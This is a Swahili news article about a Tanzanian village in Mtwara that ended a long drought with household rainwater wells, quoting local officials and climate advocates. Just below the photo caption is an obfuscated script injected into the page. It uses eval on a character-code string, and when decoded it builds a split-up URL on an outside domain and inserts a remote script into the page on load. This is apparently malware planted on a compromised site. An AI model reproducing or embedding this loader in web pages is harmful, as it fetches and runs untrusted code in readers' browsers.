Recent Comments

Mbinu za asili zilivyofuta ukame wa miaka 30 Kijiji cha Mwang’anga

By Juma Issihaka May 4, 2021
<p>Wananchi wakipata huduma ya maji kwenye kisima cha asili</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

HALI ya ukame iliyodumu kwa takribani miongo mitatu katika Kijiji cha Mwang’anga mkoani Mtwara, imepata suluhu ya kudumu baada ya wananchi kubuni mbinu ya kutatua changamoto hiyo.

Mwanzo wa utatuzi wa changamoto hiyo, ulianzia kwenye vikao maalumu vilivyolenga kusaka suluhu ya kudumu na kuwaondolea adha wananchi wa eneo hilo.

Halima Mohamed, ni Mwanafunzi wa Shule ya Sekondari Mbembaleo na mkazi wa kijiji hicho, anasema katika miaka yote ya ukame kijijini hapo, walilazimika kusafiri umbali wa takriban kilometa 10 ilii kufikia eneo inakopatikana huduma hiyo.

Anasema hali hiyo ilikuwa chanzo cha wanafunzi wengi hasa wanawake kusitisha masomo kwani walichoshwa na shughuli za nyumbani na hivyo kukosa muda wa kujielekeza kwenye masomo.

Halima anasema mbali na kuacha pia hali ya utoro ilikithiri kwa wanafunzi hususan wanawake katika shule za kijiji hicho kwakuwa kabla ya kwenda shule walitakiwa kuanza na kufuata maji.

Hata hivyo, anasema amekuwa akihadithiwa na wakubwa zake kuwa changamoto hiyo katika Kijiji hicho, ina zaidi ya miaka 30 na sasa ndiyo angalau wamepata ufumbuzi.

Anasema hatua zilizochukuliwa sasa zimesaidia kuokoa hatma ya masomo ya wasichana wengi ambao awali walikwama kufanya hivyo kutokana na kukabiliwa na majukumu ya nyumbani.

Halima anasema hatua hiyo pia, inadhihirisha kwamba kuhusisha wa mifumo ya maarifa na ujuzi asilia katika mipango ya maendeleo, unachagiza ufanisi na kuleta matokeo ya maendeleo endelevu kwenye jamii.

Mwanafunzi huyo anasema walau kwa sasa kijijini hapo kumekuwa na ahueni kuhusu upatikanaji wa huduma hiyo, licha ya kubaki na changamoto ya usalama.

Anasisitiza kuwepo kwa ushirikiano wa viongozi wa ngazi zote na jamii utasaidia kuongeza matumizi ya maarifa asilia yatakayowezesha wananchi kukabiliana na athari za mabadiliko ya tabianchi hususani ukame.

Khadija Livanga, ni Diwani wa Kata ya Mbembaleo inayojumuisha kijiji hicho, anasema hali ya ukame katika eneo hilo ilianza miaka mingi iliyopita kwani alifika hapo mwaka 1992 na kuikuta.

Anasema baada ya adha hiyo kwa muda mrefu waliona kuna umuhimu wa kufanya vikao kwa ajili ya kujadili mkakati maalumu ili kupata suluhu ya kudumu ya changamoto hiyo iliyokuwa ikiwakabili.

“Kukabiliana na changamoto hii tuliitana na kukaa vikao, ndipo tulipoona kuna fursa katika uvunaji na uhifadhi wa maji ya mvua kwa njia ya kuchimba visima” anasema.

Diwani huyo anasema baada ya vikao hivyo, waliamua kuanza kujenga visima vya kina cha futi 10 kwenye kila nyumba kulingana na uwezo binafsi wa kaya na kuvizungushia miti ili kuboresha ulinzi na usalama wa maji.

Anasema visima hivyo vinatunza maji kwa miezi sita hadi nane, hivyo kupitia ubunifu huo wamefanikiwa kukabiliana na changamoto ya ukame na kutembea kwa umbali mrefu kutafuta maji.

Anasisitiza kuwa ni muhimu kwa jamii kuiga mfano huo badala ya kuisubiri serikali iwafanyie kila kitu.

Nashiri Pontiya ni Ofisa wa Rasilimali jamii wa Jukwaa la Wadau la kukabiliana na mabadiliko ya tabianchi (FORUMCC), anasema ili kufanikiwa katika kuboresha mbinu za ubunifu za kulinda maarifa asilia, unahitaka ushirikiano wa dhati kati ya asasi za kiraia na ngazi zote za serikali.

Anashauri serikali, asasi za kiraia, wadau wengine wa maendeleo na sekta binafsi kuunda mikakati ya kuwawezesha wanawake, wasiojiweza, wenye ulemavu na wazee ili wawe na urahisi wa kupata maji safi na salama.

Anasema mabadiliko ya tabianchi yana athari za moja kwa moja katika maji, usafi na afya, licha ya kwamba bado athari hizo nchini hazijaeleweka vyema.

Anasema athari hizo hupunguza ubora wa maji, mifumo ya uzalishaji wa chakula na shughuli za kiuchumi na kijamii.

Pontiya anasema athari hizo hazigusii kwenye ubora wa maji pekee bali hata kuongeza gharama ya usambazaji wa huduma hiyo nyumbani.

Emmanuel Mbeyela, ni Mtaalamu wa mazingira, anasema uhaba wa maji ni hatari kwa jamii na mazingira kwani yasipopatikana kuna uwezekano wa kuongezeka kwa athari za afya na ustawi wa jamii.

Kwa upande wa vijijini, anasema mara nyingi vyanzo vikuu vya maji ni chemchem na mito, ndivyo vinavyotegemewa na wakulima kwa umwagiliaji na shughuli nyingine ikiwemo matumizi ya kila siku ya nyumbani.

Anasema kukosekana kwa maji ya kutosha kunaweza kuhatarisha usalama wa wanawake, ambapo watalazimika kutembea umbali mrefu kutafuta huduma hiyo, pia kukosa muda wa kujihusisha na shughuli nyingine za jamii na uchumi.

Mtaalamu huyo, anasema wakati mwingine adha ya mafuriko kutokana na mvua zisizotabirika husababisha kuharibika kwa miundombinu ya maji taka na maji safi hivyo kuiweka jamii kwenye hatari ya kupatwa na magonjwa ya milipuko ikiwemo kipindupindu na kichocho.

Pia anasema kwa sasa ongezeko la maji chumvi kutoka baharini hupunguza rutuba ya ardhi, kiwango na ubora wa maji kwa ajili ya shughuli za kilimo na matumizi ya nyumbani.

Anasema tayari serikali imetambua uwepo wa athari hizo za mabadiliko ya tabianchi na hivyo imekuwa ikifanya jitihada kupunguza ukali wa athari hizo.

Anazitaja jitihada hizo ni kuundwa kwa programu ya Kitaifa ya Kuhimili Mabadiliko ya Tabianchi (2007), Mkakati wa Mabadiliko ya Tabianchi (2012) ambao kwa sasa upo kwenye mapitio.

Anasema pia serikali imeanzisha Mpango wa Kilimo wa Kuhimili Mabadiliko ya Tabianchi (2014 hadi 2019), Programu ya Kitaifa ya Kilimo Kinachohimili Mabadiliko ya Tabianchi (2015) na Michango ya Kitaifa ya Kukabiliana na Mabadiliko ya Tabianchi (2016) iliyowasilishwa kwenye Mkataba wa Umoja wa Mataifa wa Mabadiliko ya Tabianchi.

Pia, Dira ya Maendeleo Taifa, Sheria ya Usimamizi wa Rasilimali za Maji (2009), Sera ya Maji (2002), Programu ya Maendeleo ya Sekta ya Maji (2006-2025), Sheria ya Maji na Usafi wa Mazingira (2019), Mpango wa sekta ya afya wa kukabiliana na mabadiliko ya tabianchi (2018 -2023).

Pamoja na juhudi hizo pia serikali imesaini mkataba wa Makubaliano ya Paris ya mwaka 2015 na Malengo ya Maendeleo Endelevu (SDGs).

Kufuatia hilo, mtandao wa kitaifa wa asasi za kiraia zinazofanya shughuli zake katika masuala yanayohusiana na mabadiliko ya tabianchi (FORUMCC), unasimamia mradi wa kuongeza ushiriki wa asasi za kiraia katika utekelezaji wa Makubaliano ya Paris ya mwaka 2015 na Malengo ya Maendeleo Endelevu (SDGs).

Hata hivyo, mradi huo unasimamiwa kwa kushirikiana na Muungano wa Asasi za Afrika unaojihusisha na kusimamia haki katika muktadha wa mabadiliko ya tabianchi (PACJA).

Akizungumza na gazeti hili mshawishi na mtetezi wa masuala ya mabadiliko ya tabianchi, kupitia mradi huo, Gladness Lauwo, anasema anasema ubovu wa miundombinu ya uhifadhi na usambazaji wa maji, kuongezeka kwa janga la ukame na mafuriko ni miongoni mwa mambo yanayosababisha changamoto ya upatikanaji wa maji nchini.

Anasema jambo muhimu ni kuimarisha uwekezaji kwenye sekta ya maji kwa kushirikisha wadau wa maendeleo na sekta binafsi.

Anaongeza pia kuna haja ya kuboreshwa kwa mifumo ya usimamizi wa maji na vyanzo vyake, kadhalika kuongeza uwezo wa wanawake kuchangia kwenye mbinu za kuleta uhimili ili maji yapatikane kwa uhakika.

Itakumbukwa kuwa Jopo la Serikali za Kitaifa kuhusu Mabadiliko ya Tabianchi (IPCC) lilitahadharisha mataifa juu ya hatari ya mabadiliko ya tabianchi katika rasilimali za maji safi na salama.

Utafiti uliofanywa na Taasisi ya Kimataifa ya Utafiti wa Sera ya Chakula, unabainisha kuwa zaidi ya nusu ya watu bilioni 4.8 Duniani na takriban nusu ya uzalishaji wa nafaka itakuwa hatarini kutokana na dhiki na uhaba wa maji ifikapo 2050 ikiwa biashara zitaendelea kama kawaida.

Hivyo basi, ili kufikia Malengo ya Maendeleo Endelevu, italazimika kujenga uthabiti wa jamii na mazingira dhidi ya mabadiliko ya tabianchi na kuandaa jamii kuhimili majanga.

0000000000

 

By Juma Issihaka

Juma Issihaka, is the senior journalist with more than five years of experience on the profession. He mostly base on Politics reporting, Environment reporting as well as social affairs.